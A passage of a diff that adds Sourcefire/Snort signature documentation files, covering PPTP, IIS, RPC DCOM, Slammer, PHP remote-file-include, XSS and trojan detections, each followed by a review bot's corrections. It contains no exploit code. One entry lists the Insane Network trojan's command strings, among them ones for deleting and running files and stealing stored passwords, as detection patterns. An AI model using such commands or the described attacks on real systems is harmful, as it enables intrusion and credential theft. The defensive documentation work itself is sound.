+SYSTEM level access to the remote host.
+
+--
+
+Ease of Attack:
+Difficult.  Currently Sourcefire is unaware of any publicly available 
+exploits for this vulnerability.
+
+--
+
+False Positives:
+PPTP clients that violate RFC2637 by generating overly long Host Name and
+Vendor Strings could potentially trigger this rule inadvertently.
+
+--
+
+False Negatives:
+None Known.
+
+--
+
+Corrective Action:
+Microsoft as released the following patches to correct the problem:
+
+Microsoft Windows 2000 Professional SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Server SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Advanced Server SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Terminal Services SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Advanced Server SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Professional SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Server SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Terminal Services SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows XP Home SP1:
+
+    Microsoft Patch Q329834
+    http://download.microsoft.com/download/whistler/Patch/Q329834/WXP/EN-US/Q329834_WXP_SP2_x86_ENU.exe
+
+Microsoft Windows XP Professional SP1:
+
+    Microsoft Patch Q329834
+    http://download.microsoft.com/download/whistler/Patch/Q329834/WXP/EN-US/Q329834_WXP_SP2_x86_ENU.exe
+
+Microsoft Windows XP 64-bit Edition SP1:
+
+    Microsoft Patch Q329834
+    http://download.microsoft.com/download/whistler/Patch/Q329834/W64XP/EN-US/Q329834_WXP_SP2_ia64_ENU.exe
+
+--
+
+Contributors:
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1214
+http://www.securityfocus.com/bid/5807
+
+
+--
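Review bot: Detailed Information contradicts Impact and the Affected Systems list: it says the overflow "may permit executation of arbitrary commands with the privileges of root", but this is a Windows 2000/XP PPTP service and Impact correctly says the NT SYSTEM account; change it to "with the privileges of the SYSTEM account" and fix "executation" in both places. Affected Systems lists only Windows 2000 editions while Corrective Action lists Q329834 downloads for Windows XP Home, Professional and 64-bit Edition, so Windows XP should be added (MS02-063 and CAN-2002-1214 cover both). The Windows 2000 patch list repeats the identical Q329834 URL eight times; one entry per distinct download (Windows 2000 SP2/SP3, XP x86, XP ia64) says the same thing. "Microsoft as released" should read "has released", and the packet is the Start-Control-Connection-Request (SCCRQ in RFC 2637), which is the message whose Host Name and Vendor String fields the False Positives note refers to; naming it that way ties the two sections together.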
--- /dev/null
+++ b/doc/signatures/1245.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1245
+
+--
+Summary:
+This event is generated when an attempt is made to access the .idq Indexing Service ISAPI filter. 
+
+--
+Impact:
+Intelligence gathering activity. If an .idq file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  The .idq ISAPI filter provides support for Internet Data Queries.  Files with the .idq suffix should not be located on network shares.  If an attempt is made to access them from a network share, an error message is returned disclosing the share path.  
+
+--
+Affected Systems:
+Hosts running IIS 4.0
+Hosts running IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can attempt to access a file with the .idq suffix in an attempt to receive an error message with disclosure about the share path.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Do not place files with the .idq suffix on a network share.
+ 
+
+--
+Contributors:
+Original rule written by Dr SuSE and C. Mayor 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0071
+
+
+--
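Review bot: The Impact sentence is ungrammatical and loses its meaning: "If an .idq file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed." Suggest: "If an .idq file is served from a network share, the error message returned for a request to it discloses the share path." Detailed Information should also say what the disclosed path gives an attacker (internal server names and directory layout for later attacks), since that is the reason the event is classed as intelligence gathering. The line `+ ` in Corrective Action is a stray whitespace-only line.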
--- /dev/null
+++ b/doc/signatures/100000552.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000552
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "SmartSiteCMS" application running on a webserver. 
+Access to the file "inc_foot.php" using a remote file being passed as the 
+"root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "root" parameter in the "inc_foot.php" script used by 
+the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
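Review bot: The third paragraph of Detailed Information and the Attack Scenarios section are boilerplate from an authentication-bypass template and do not describe a remote file include: "Some applications do not perform stringent checks when validating the credentials of a client host" and "An attacker can access an authentication mechanism and supply his/her own credentials" have nothing to do with passing a URL in the "root" parameter of "inc_foot.php". Replace Attack Scenarios with the RFI case (a request to inc_foot.php with root set to a URL under the attacker's control, so the web server fetches and executes the PHP found there) and drop the credentials paragraph. Corrective Action could add the PHP-side mitigation (allow_url_include off, and allow_url_fopen off where the application permits) since a vendor patch may not be available. Also "ona web server" should read "on a web server", "an exploitation attempt has been attempted" is redundant, and the Sid block is missing the blank line before `--` that the other files use.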
--- /dev/null
+++ b/doc/signatures/2671.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2671
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Internet Explorer.
+
+--
+Impact:
+A successful attack can cause a buffer overflow and present the attacker
+with the opportunity to execute code of their choosing on a vulnerable
+system.
+
+--
+Detailed Information:
+An error in the processing of bitmap images exists in Internet Explorer
+that can present an attacker with the opportunity to execute code of
+their choosing on a vulnerable system.
+
+The error exists due to poor boundary checking in the processing of
+bitmap images.
+
+--
+Affected Systems:
+	Microsoft Windows using Internet Explorer
+
+--
+Attack Scenarios:
+An attacker would need to supply a malformed bitmap image either in a
+web page or possibly via HTML email to a victim host.
+
+--
+Ease of Attack:
+Simple, exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/ms04-025.mspx
+
+--
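Review bot: Affected Systems ("Microsoft Windows using Internet Explorer") is too broad to be useful; MS04-025 names the affected Internet Explorer versions (5.01, 5.5 and 6), and those are what should appear here. Additional References should also carry the CVE identifier that MS04-025 assigns to the malformed BMP buffer overrun so the event can be correlated with other tooling. Detailed Information says the same thing twice ("error in the processing of bitmap images" and then "poor boundary checking in the processing of bitmap images"); one sentence stating that a length field in the bitmap is not bounds-checked before the image data is copied would be clearer.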
--- /dev/null
+++ b/doc/signatures/3015.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+3015
+-- 
+Summary: 
+This event is generated when an attempt is made to request a connection on port 2000 using the Insane Network 4.0 trojan.
+
+-- 
+
+Impact: 
+If connected, the attacker could remotetly execute a multitude of functions resulting in a full compromise of the victim's machine.
+
+--
+Detailed Information:
+Insane Network 4.0 uses port 2000 as its default, but -2000, or port 63536, incarnations also exist.
+Insane Network 4.0 has a number of functions. The following strings are indicative of a particular Insane Network 4.0 attack.
+Be aware that some versions of Insane Network 4.0 will send their attack strings one letter at a time. For example,
+to send the bomb command, some versions will send only one letter per packet, resulting in bomb being spelled out in multiple packets.
+
+Format: Name of function (Description of what it does *only if necessary*) - string to look for
+
+Bomb ("Bombs" monitor) - bomb
+Snow (Makes monitor snowy) - snow
+Melt ("Melts" the screen) - melt
+Reverse (Reverses screen) - reverse
+Copy File - cp followed by a file name and the destination path
+Ctrl-Alt-Del (Enable/Disable Ctrl-Alt-Del) - cad -e (for enable) cad -d (for disable)
+Delete File - rm followed by a file name, including path
+File List - ls followed by directory
+File Sharing (Gets shared file password information) - share
+Dial-Up Passwords (Get Dial-up password information) - passwd
+Make Text File - mktext
+Popup Message - popup
+Read File - cat followed by a file name, including path
+Reboot - reboot
+Registry Edit - regrun
+Rename File - ren followed by a file and its new name
+Run File - exec followed by a file name, including path
+Shutdown - shutdown
+Taskbar (Enable/Disable Task Bar) - task -e (for enable) tast -d (for disable)
+Telnet - telnet
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address, port number (which 
+is assigned to the server program by the attacker: default is 2000), and presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove insane network.exe and commands.txt
+Kill insane network.exe in the process list
+
+Keep your anti-virus software updated with the latest virus definitions.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+http://www.pestpatrol.com/PestInfo/i/insane_network.asp
+
+
+--
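Review bot: The Taskbar entry has a typo in a command string that readers will copy into detection content: "task -e (for enable) tast -d (for disable)" should read "task -d". "remotetly" in Impact should be "remotely". The port sentence "port 2000 as its default, but -2000, or port 63536, incarnations also exist" needs a word of explanation: a negated port value stored as an unsigned 16-bit number wraps to 65536 - 2000 = 63536, which is why that second port appears. The one-letter-per-packet variant described in Detailed Information is exactly the case in which a single-packet content match on "bomb" will miss, so it belongs under False Negatives instead of "None known".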
--- /dev/null
+++ b/doc/signatures/3309.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3309
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
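Review bot: Attack Scenarios does not match Detailed Information: "An attacker may make a request for a file with an overly long filename via a network share" describes SMB file access, while the rest of the text (and the RPC DCOM vulnerability) concerns malformed data in an RPC request; the overflow is triggered by an overly long server name in the path carried inside the DCOM activation request, not by opening a file on a share. Suggest: "An attacker sends a crafted DCOM activation request over RPC (typically TCP 135) containing an overly long server name." "Expoit code exists" should read "Exploit code exists", and Additional References is empty although a Microsoft bulletin and CVE exist for this issue and should be listed so the reader can tell which of the RPC DCOM vulnerabilities this rule covers.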
--- /dev/null
+++ b/doc/signatures/100000358.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000358
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BASE" application running on a webserver. Access to the file "base_include.inc.php" using a remote file being passed as the "BASE_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "BASE_path" parameter in the "base_include.inc.php" script used by the "BASE" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BASE
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
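Review bot: The credentials paragraph in Detailed Information and the Attack Scenarios text are template boilerplate that does not apply to a remote file include in "base_include.inc.php" via "BASE_path": the attacker does not supply credentials, they supply a URL, and the server fetches and executes the PHP found there. Attack Scenarios should say that, and the "validating the credentials of a client host" paragraph should go. "ona web server" should read "on a web server", and the file begins with two empty added lines before "Rule:" that the other signature files do not have.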
--- /dev/null
+++ b/doc/signatures/2004.txt
@@ -0,0 +1,85 @@
+Rule:  
+
+--
+Sid:
+2004
+
+--
+Summary:
+This event is generated when an attempt is made by the "Slammer" worm to
+compromise a Microsoft SQL Server. Specifically, this rule generates an 
+event when the worm activity eminates from the protected network.
+
+--
+Impact:
+A worm targeting a vulnerability in the MS SQL Server 2000 Resolution 
+Service was released on January 25th, 2003.  The worm attempts to 
+exploit a buffer overflow in the Resolution Service.  Because of the 
+nature of the vulnerability, the worm is able to attempt to compromise 
+other machines very rapidly.
+
+--
+Detailed Information:
+The Monitor Service provided by MS SQL and MSDE uses unchecked client
+provided data in an SQL version check function.
+
+The worm attempts to exploit a buffer overflow in this version request.
+If the worm sends too many bytes in the request that triggers the 
+version check, then a buffer overflow condition is triggered resulting 
+in a potential compromise of the SQL Server.
+
+This event is indicative of an existing infection on the protected 
+network. The event is generated on outgoing traffic.
+
+--
+Affected Systems:
+This vulnerability is present in unpatched MS SQL Servers.  The 
+following unpatched services containing MS SQL or Microsoft Desktop 
+Engine (MSDE) may potentially be compromised by this worm:
+
+* SQL Server 2000 (Developer, Standard, and Enterprise Editions)
+* Visual Studio .NET (Architect, Developer, and Professional Editions)
+* ASP.NET Web Matrix Tool
+* Office XP Developer Edition
+* MSDN Universal and Enterprise subscriptions
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Exploits for this vulnerability have been publicly published.
+
+A worm has been written that automatically exploits this vulnerability.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Block external access to the MS SQL services on port 1433 and 1434 if 
+possible.
+
+Patches from Microsoft are available that fix this vulnerability.  The 
+patches are available from
+
+www.microsoft.com/technet/security/bulletin/MS02-039.asp
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
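Review bot: Detailed Information names the vulnerable component "Monitor Service" while Impact calls it the "Resolution Service"; use one name, SQL Server Resolution Service (UDP 1434), since that is the service the worm's single UDP packet targets. Corrective Action's "port 1433 and 1434" should state the protocol: the worm only uses UDP 1434, so that is the port that stops it, while TCP 1433 is a separate exposure of the SQL server itself. "eminates" should read "emanates", "publicly published" should read "publicly available", and Additional References is empty although MS02-039 is cited above and CVE-2002-0649 (the Resolution Service overflow) exists and should be listed.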
--- /dev/null
+++ b/doc/signatures/406.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+406
+
+--
+
+Summary:
+This event is generated when An ICMP Source Route Failed datagram is detected on the network.  
+
+--
+
+Impact:
+The datagram that generated with ICMP datagram failed to transverse the network.  This could be an indication of routing or network problems.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
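Review bot: The Impact sentence is garbled: "The datagram that generated with ICMP datagram failed to transverse the network" should read "The datagram that triggered this ICMP message failed to traverse the network", and "could indication routing problems" in Detailed Information should read "could indicate". The file is also missing the Affected Systems section that the other signature files carry. Worth adding for context: Source Route Failed is ICMP Destination Unreachable (type 3) code 5 and is only sent in response to a datagram carrying a source-route option; most hosts and routers drop source-routed packets, so seeing these messages is a reason to find out who is emitting source-routed traffic, which makes "Attack Scenarios: None Known" too strong given that Ease of Attack says tools can generate them.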
--- /dev/null
+++ b/doc/signatures/2704.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2704
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
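Review bot: Affected Systems lists only "Oracle iSQLPlus", but Detailed Information describes buffer overflows in "numerous packages and procedures" of the database itself and Attack Scenarios refers to "the procedure in question" without ever naming it. Either name the package/procedure the rule matches and the database versions affected, or, if the rule really targets iSQL*Plus, say so in Detailed Information; as written the reader cannot tell what traffic fires the event. Additional References is empty and should list the Oracle alert or advisory the rule was derived from. "Apply the appropriate vendor supplied patch" could usefully add restricting network access to the listener to the application hosts that need it.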
--- /dev/null
+++ b/doc/signatures/721.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+721
+
+--
+Summary:
+This event is generated when network activity indicating possible virus
+infection is detected.
+
+--
+Impact:
+Malicious code infection.  This event may indicate that an internal host
+may be infected with some kind of malicious code.
+
+--
+Detailed Information:
+This event may indicate a possible virus infection of a host on the
+protected network.
+
+--
+Affected Systems:
+	Various systems
+
+--
+Attack Scenarios:
+Viruses may propogate in many different ways. Many arrive in the form of
+email attachments that an unsuspecting user may trigger by opening the
+attachment. Once infected, many viruses have the ability to use the
+infected host as a means of spreading copies of itself to other machines
+on the protected and external networks.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use antivirus software on hosts to terminate infectors.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
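Review bot: The document never says what network activity the rule matches, so an operator cannot judge an alert: Summary, Impact and Detailed Information all restate "possible virus infection". State the protocol and the content or pattern that fires (for example an attachment name or payload string). "propogate" should read "propagate", and "copies of itself" should agree with "many viruses" ("copies of themselves"). Corrective Action should also mention isolating the host from the network before cleaning, since the text itself says the infected host is used to spread to other machines.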
--- /dev/null
+++ b/doc/signatures/100000658.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000658
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "number" parameter in the "guestbook.php" 
+script used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
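Review bot: Impact and the second paragraph of Detailed Information overstate a cross-site scripting issue: "system integrity compromise", "unauthorized administrative access to the server" and "execute system binaries" describe server-side code execution, whereas XSS via the "number" parameter of "guestbook.php" executes script in the browser of the user who follows the link (session cookie theft, actions performed as that user against the guestbook). Suggest rewriting Impact to that client-side scope and deleting the "execute system binaries" paragraph. Corrective Action could add output encoding of the "number" parameter, since "apply vendor patches" is the only remedy given.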
--- /dev/null
+++ b/doc/signatures/1470.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1470
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
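Review bot: Summary and Detailed Information are generic and name neither the CGI application nor the script or parameter the rule matches, so an operator reading this cannot validate the event; state the URI and parameter the rule looks for. The "validating the credentials of a client host" paragraph describes an authentication bypass while the next paragraph describes input injection; keep the one that matches the rule. "ona web server" should read "on a web server".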
--- /dev/null
+++ b/doc/signatures/100000334.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000334
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CaLogic Calendars" application running on a webserver. Access to the file "reconfig.php" using a remote file being passed as the "CLPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CLPath" parameter in the "reconfig.php" script used by the "CaLogic Calendars" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CaLogic Calendars
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
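Review bot: The last paragraph of Detailed Information and the Attack Scenarios section ("supply his/her own credentials to gain access") describe credential validation, which is not what a remote file include through the "CLPath" parameter of "reconfig.php" is; the attacker supplies a URL and the server includes and runs the PHP it fetches. Replace Attack Scenarios with that description and drop the credentials paragraph. "an exploitation attempt has been attempted" is redundant, "ona web server" should read "on a web server", and the file begins with two empty added lines before "Rule:".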
--- /dev/null
+++ b/doc/signatures/676.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
